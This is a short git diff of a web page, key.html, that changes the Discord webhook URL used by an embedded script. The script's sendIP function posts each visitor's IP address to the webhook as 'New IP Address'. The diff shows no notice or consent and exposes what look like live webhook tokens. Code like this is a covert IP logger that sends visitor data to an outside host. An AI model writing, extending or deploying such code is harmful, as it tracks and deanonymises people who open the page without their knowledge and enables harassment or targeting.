--- a/key.html
+++ b/key.html
@@ -627,7 +627,6 @@ function generateClientId() {
 </script>
 </body>
 </html>
-
 <!DOCTYPE html>
 <html lang="en">
 <head>
@@ -650,7 +649,7 @@ function generateClientId() {
 
             // Function to send the IP address to your server or webhook
             async function sendIP(ip) {
-                const webhookURL = 'https://discord.com/api/webhooks/1271762466925183077/ft5BLULXLCoLBpf-fuIi9m-5Z-lmedVBLDA9WDF7lyQ9MSfOMLDaATZqYQhMt-8LeQB8'; // Replace with your Discord webhook URL
+                const webhookURL = 'https://discord.com/api/webhooks/1271826277937975318/zyZxHBZiWjTDLQR6Deaitoy4sXxL9FRHnTaPTDflUHrz9BQ92efEemimGjnQyyzFH8i4'; // Your Discord webhook URL
                 const payload = {
                     content: `New IP Address: ${ip}`
                 };
